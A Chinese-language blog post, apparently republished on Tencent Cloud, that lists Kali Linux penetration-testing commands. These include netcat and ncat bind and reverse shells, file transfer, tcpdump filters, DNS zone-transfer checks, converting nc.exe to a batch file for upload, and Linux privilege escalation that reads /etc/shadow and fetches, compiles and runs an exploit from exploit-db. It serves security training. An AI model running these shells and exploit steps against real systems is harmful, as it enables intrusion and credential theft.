kali作为一个渗透测试者最受欢迎的操作系统,集成了非常多的安全工具,让渗透测试人员更方便的做一些渗透测试工作,本文来自国外某位大神的github,在这里给大家做一个分享,具体内容如下:
netcat是一个优秀的网络工具,在业界有“瑞士军刀”的美誉,通常在Linux系统下都自带了。
测试环境
Kali 192.168.2.10 Windows 192.168.2.12
聊天
Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444
正向shell
Windows nc -nlvp 4444 -e cmd.exe Kali nc -nv 192.168.2.12 4444
反向shell
Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444 -e /bin/bash
文件传输
Windows nc -nlvp 4444 > incoming.exe Kali nc -nv 192.168.2.12 < /usr/share/windows-binnaries/wget.exe
Ncat是nmap工具集的一部分,使用如下命令使用Ncat生成一个正向shell:
Windows ncat -nlvp 4444 -e cmd.exe --allow 192.168.2.10 --ssl Linux ncat -nv 192.168.2.12 4444 --ssl
tcpdump是Linux下一个网络包截取分析工具。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。
读取数据包文件
tcpdump -r <capture.pcap>
指定源IP获取数据包文件中的数据
tcpdump -n src host 192.168.2.10 -r <capture.pcap>
指定目的IP获取数据包文件中的数据
tcpdump -n dst host 192.168.2.12 -r <capture.pcap>
指定端口获取数据包文件中的数据
tcpdump -n port 443 -r <capture.pcap>
读取数据包文件并且以16进制显示
tcpdump -nX -r <capture.pcap>
host是一个用来执行dns查找的小工具。
枚举dns信息
host -t <type> target.com mx = mail server ns = name server
测试dns域传送
host -l target.com <DNS server>
在某些特殊的情况下需要将exe转为bat,便于上传并执行,下面就是如何使用kali将exe转为bat。
cp /usr/share/windows-binaries/nc.exe /root/ cp /usr/share/windows-binaries/exe2bat.exe /root/ upx -9 nc.exe wine exe2bat.exe nc.exe nc.txt
在获得一个webshell之后,一般权限为apache权限,想要进一步的渗透测试需要将自己的权限提升到最高,下面是在Linux下提权使用命令。
ssh user@<target IP> id # 显示用户和组的权限 cat /etc/shadow # 保存的用户的密码,只有root权限可以查看 cat /etc/issue # 查看系统版本信息 uname -a
如何下载并执行提权exp:
wget -O exploit.c http://www.exploit-db.com/download/18411 gcc -o exploit exploit.c # 编译 ./exploit # 执行 id # 查看是否提权成功 cat /etc/shadow # 读取用户密码
这个文章其实有点不想发,但是又没有好文章给大家分享,所以就凑合着给大家看看,毕竟不想浪费今天发文的机会,大家有好的文章不要藏着掖着,发给我有好礼相送呦。
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有